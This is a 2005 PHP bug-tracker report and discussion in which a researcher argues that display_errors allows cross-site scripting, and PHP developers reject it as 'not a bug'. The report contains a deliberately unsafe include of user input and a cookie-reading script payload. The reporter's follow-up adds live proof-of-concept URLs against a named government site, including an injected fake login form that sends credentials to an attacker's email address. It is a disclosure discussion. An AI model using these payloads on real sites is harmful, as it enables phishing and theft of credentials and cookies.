php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #33173 Bug in PHP 4.3.11 display_error.
Submitted: 2005-05-28 16:57 UTC Modified: 2005-05-30 19:52 UTC
From: max at jestsuper dot pl Assigned:
Status: Not a bug Package: *General Issues
PHP Version: * OS: *
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: max at jestsuper dot pl
New email:
PHP Version: OS:

 

 [2005-05-28 16:57 UTC] max at jestsuper dot pl
Description:
------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Author: cXIb8O3(Maksymilian Arciemowicz)
Date: 28.5.2005
from securityreason.com TEAM

- --- 0. Bug in PHP 4.3.11 display_error. ---

This bug can be danger, because someone can do xss and Phishing attack.
Problem exist in display_errors..

Example php script:

<?php
include($_GET['varible']);
?>

and now request is

?varible=XXX

so can we see any error.

- ---
Warning: main(XXX): failed to open stream: No such file or directory in /www/dupa.php on line 2

Warning: main(): Failed opening 'XXX' for inclusion (include_path='.:') in /www/dupa.php on line 2
- ---

Normal. But now varible have for example <h1>SR</h1>
And error messages is:

- ---
Warning: main(
SR
): failed to open stream: No such file or directory in /www/dupa.php on line 2

Warning: main(): Failed opening '<h1>SR</h1>' for inclusion (include_path='.:') in /www/dupa.php on line 2
- ---

So XSS...

Danger can be tag <script> <iframe>, because you can see cookies etc.
For example.

?varible=<script>alert(document.cookie);</script>

And have you cookies from this domain!

This XSS is critical, because exist in display_error and hacker can do XSS and Phishing attack.
For example, if this bug exist in a Bank site... hacker can create <FORM> or mirror site...

- --- 1.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (FreeBSD)

iD8DBQFCmIWvznmvyJCR4zQRAuqtAKCcyXWQnMdPvCn+6+npQiGEbXvAZwCgq172
+J8w9EzGFE49sXxP1MPbSfI=
=QksY
-----END PGP SIGNATURE-----


Actual result:
--------------
XSS

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2005-05-28 19:02 UTC] helly@php.net
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

You're not supposed to pass the error information to your users. Show erros is only a convenience thing to aid you while developing. Thus no user will ever see such error messages. So in the end it is not usable for phishing and alike.
 [2005-05-30 18:56 UTC] max at jestsuper dot pl
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

>  ID:               33173
>  Updated by:       helly@php.net
>  Reported By:      max at jestsuper dot pl
> -Status:           Open
> +Status:           Bogus
>  Bug Type:         *General Issues
> -Operating System: FreeBSD
> +Operating System: *
> -PHP Version:      4.3.11
> +PHP Version:      *
>  New Comment:
>
> Thank you for taking the time to write to us, but this is not
> a bug.

This is bug [XSS]. 

> Please double-check the documentation available at 
> http://www.php.net/manual/ and the instructions on how to report
> a bug at http://bugs.php.net/how-to-report.php

Ok. But this bug still exists, if (html_errors false) etc.

>
> You're not supposed to pass the error information to your users. Show
> erros is only a convenience thing to aid you while developing. Thus no
> user will ever see such error messages. So in the end it is not usable
> for phishing and alike.

Is is.. ;] That can be very dangers. For example phishing. This is XSS!
So ok. Example newweb.wrh.noaa.gov

http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=%3CP%3E%3Cfont%20color=red%3E%3CP%3E%3Ch1%3EWARNING!%20SYSTEM%20ERROR%3CBR%3EPlease%20login:
%3C/h1%3E%3C/font%3E%3Cfont%20size=-4%3E%3C/center%3E%20%3CFORM%20METHOD=POST%20ACTION=mailto:haker@blabla.pl%3E%3CP%3ELOGIN:
%3CINPUT%20TYPE=text%20NAME=login%20SIZE=9%3E%3CP%3EPASSWORD:
%3CINPUT%20TYPE=password%20NAME=passwd%20SIZE=9%3E%3CP%3E%3Cinput%20type=submit%20name=go%20value=Login%3E%3C/form%3E%3Cfont%20color=white%3E

http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=<iframe 
src=http://newweb.wrh.noaa.gov>

But php errors (Warning) can be in a BANK site... and can you create form ... 
phishing!

Tell me what is wrong. Thx

SecurityResason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (FreeBSD)

iD8DBQFCmjvuznmvyJCR4zQRApfYAKCHEknKWRw8zchV6qIwkM0DZt9JNQCfRvcm
IDvuoOSzh75uSA9A1xnFiYc=
=S4rb
-----END PGP SIGNATURE-----
 [2005-05-30 19:52 UTC] johannes@php.net
Here we have two errors:  
  
a) letting unchecked data be used as filename  
b) showing plain errors to the user  
  
about a) _every_ input data needs to be checked. Or we  
would need to remove eval since some user might do a  
eval($_GET['code'])  
  
about b) as Marcus wrote you shouldn't show plain error 
messages to your users. This for two reasons: first the 
user doesn't understand what's wrong and might think he's 
to stupid and second for a bit of security, if the some 
bad guy doesn't know where a GET-value is used he has 
limited chance in finding an exploit. 
 
And a further note: changing the filename for the error 
message might also make debugging harder since the name 
shown isn't exactly the one used so it might be harder to 
track the reason 
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Sat Dec 21 14:01:32 2024 UTC